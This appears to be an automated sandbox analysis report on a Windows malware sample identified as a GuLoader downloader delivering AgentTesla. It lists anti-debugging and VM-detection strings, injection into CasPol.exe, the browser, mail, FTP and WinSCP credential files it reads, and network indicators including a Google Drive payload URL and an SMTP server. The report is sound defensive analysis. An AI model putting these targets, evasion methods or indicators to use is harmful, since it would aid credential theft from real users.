          Source: CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210603305.0000000002F60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209535214.00000000007F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000004.00000002.30927389187.000000000135C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209733648.0000000000823000.00000004.00000020.00020000.00000000.sdmp, xcVh7ZmH4Y.exe, 00000001.00000002.26210603305.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0>6
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209406017.00000000007DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210887969.0000000004739000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 00000004.00000002.30929131043.0000000002F69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_71031BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71031BFF
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4AAF1 rdtsc 1_2_02F4AAF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4853E mov eax, dword ptr fs:[00000030h]1_2_02F4853E
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F54EE4 mov eax, dword ptr fs:[00000030h]1_2_02F54EE4
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E245 mov ebx, dword ptr fs:[00000030h]1_2_02F4E245
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F493D1 mov eax, dword ptr fs:[00000030h]1_2_02F493D1
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F5477E mov eax, dword ptr fs:[00000030h]1_2_02F5477E
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F56353 mov eax, dword ptr fs:[00000030h]1_2_02F56353
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4D811 mov eax, dword ptr fs:[00000030h]1_2_02F4D811
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E1F3 mov ebx, dword ptr fs:[00000030h]1_2_02F4E1F3
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E1F3 mov eax, dword ptr fs:[00000030h]1_2_02F4E1F3
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E19D mov eax, dword ptr fs:[00000030h]1_2_02F4E19D
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_02F4E189 mov eax, dword ptr fs:[00000030h]1_2_02F4E189
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01046950 LdrInitializeThunk,4_2_01046950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1100000Jump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" Jump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D

          Stealing of Sensitive Information

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: Yara matchFile source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		2
          OS Credential Dumping          		3
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		1
          Obfuscated Files or Information          		1
          Credentials in Registry          		117
          System Information Discovery          		Remote Desktop Protocol2
          Data from Local System          		Exfiltration Over Bluetooth21
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)111
          Process Injection          		1
          DLL Side-Loading          		Security Account Manager431
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration1
          Non-Standard Port          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS1
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer2
          Non-Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script371
          Virtualization/Sandbox Evasion          		LSA Secrets371
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size Limits123
          Application Layer Protocol          		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items111
          Process Injection          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 623886 Sample: xcVh7ZmH4Y.exe Startdate: 10/05/2022 Architecture: WINDOWS Score: 100 24 mail.comansi.com 2->24 26 googlehosted.l.googleusercontent.com 2->26 28 2 other IPs or domains 2->28 36 Snort IDS alert for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 6 other signatures 2->42 8 xcVh7ZmH4Y.exe 2 24 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 22 C:\Users\user\AppData\...\AsOpenFile.exe, PE32+ 8->22 dropped 44 Writes to foreign memory regions 8->44 46 Tries to detect Any.run 8->46 48 Hides threads from debuggers 8->48 12 CasPol.exe 19 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 30 mail.comansi.com 77.246.191.210, 49769, 49771, 587 BITNAPbitNAPDatacenter01BarcelonaES Spain 12->30 32 drive.google.com 142.250.181.238, 443, 49755 GOOGLEUS United States 12->32 34 2 other IPs or domains 12->34 50 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->50 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal ftp login credentials 12->54 60 3 other signatures 12->60 18 conhost.exe 12->18         started        56 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->56 58 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->58 signatures9 process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          xcVh7ZmH4Y.exe38%VirustotalBrowse
          xcVh7ZmH4Y.exe23%MetadefenderBrowse
          xcVh7ZmH4Y.exe39%ReversingLabsWin32.Downloader.GuLoader
          xcVh7ZmH4Y.exe100%AviraTR/Inject.CT

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AsOpenFile.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AsOpenFile.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://DynDns.comDynDNS0%Avira URL Cloudsafe
          https://SqvSXVgUZh6rJgTP37.com0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
          http://crl.F0%Avira URL Cloudsafe
          http://mail.comansi.com0%Avira URL Cloudsafe
          http://SckyfZ.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          mail.comansi.com
          		77.246.191.210
          		truetrue
            		unknown
            drive.google.com
            		142.250.181.238
            		truefalse
              		high
              googlehosted.l.googleusercontent.com
              		142.250.185.193
              		truefalse
                		high
                doc-10-70-docs.googleusercontent.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://doc-10-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=downloadfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://doc-10-70-docs.googleusercontent.com/GCasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://127.0.0.1:HTTP/1.1CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://DynDns.comDynDNSCasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://SqvSXVgUZh6rJgTP37.comCasPol.exe, 00000004.00000002.30952228522.000000001D9B3000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952931628.000000001DA1D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.27106953909.000000001C631000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952729098.000000001DA0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30953010911.000000001DA23000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://doc-10-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927389187.000000000135C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/wCasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://doc-10-70-docs.googleusercontent.com/=(CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://crl.FxcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://mail.comansi.comCasPol.exe, 00000004.00000002.30953405175.000000001DA52000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952819183.000000001DA13000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://doc-10-70-docs.googleusercontent.com/RCasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://nsis.sf.net/NSIS_ErrorErrorxcVh7ZmH4Y.exefalse
                                  		high
                                  https://doc-10-70-docs.googleusercontent.com/CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://SckyfZ.comCasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.181.238
                                    		drive.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    142.250.185.193
                                    		googlehosted.l.googleusercontent.comUnited States
                                    		15169GOOGLEUSfalse
                                    77.246.191.210
                                    		mail.comansi.comSpain
                                    		43578BITNAPbitNAPDatacenter01BarcelonaEStrue

                                    Private

                                    IP
                                    192.168.11.1

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:623886
                                    Start date and time: 10/05/202222:08:412022-05-10 22:08:41 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 14s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:xcVh7ZmH4Y.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:17
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@6/10@3/4
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 25.2% (good quality ratio 24.7%)
                                    • Quality average: 88%
                                    • Quality standard deviation: 21.7%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 132
                                    • Number of non-executed functions: 76
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Adjust boot time
                                    • Enable AMSI

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.54.122.82
                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    22:11:15API Interceptor2701x Sleep call for process: CasPol.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    77.246.191.210MX-LC-20210809-P00286 JUSTIFICANTE.exeGet hashmaliciousBrowse
                                      JUSTIFICANTE DE PAGO CF.exeGet hashmaliciousBrowse
                                        813641BENTELERdeM#U00e9xicoSAdeCV202110193434322.exeGet hashmaliciousBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          BITNAPbitNAPDatacenter01BarcelonaESjew.arm7Get hashmaliciousBrowse
                                          • 185.74.81.100
                                          MX-LC-20210809-P00286 JUSTIFICANTE.exeGet hashmaliciousBrowse
                                          • 77.246.191.210
                                          JUSTIFICANTE DE PAGO CF.exeGet hashmaliciousBrowse
                                          • 77.246.191.210
                                          813641BENTELERdeM#U00e9xicoSAdeCV202110193434322.exeGet hashmaliciousBrowse
                                          • 77.246.191.210
                                          lessie.arm7Get hashmaliciousBrowse
                                          • 185.74.81.125

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          37f463bf4616ecd445d4a1937da06e1914.exeGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          https://myssti3.pory.app/Get hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
                                          Clear Cache- Arvind.kumar.htmlGet hashmaliciousBrowse
                                          • 142.250.181.238
                                          • 142.250.185.193
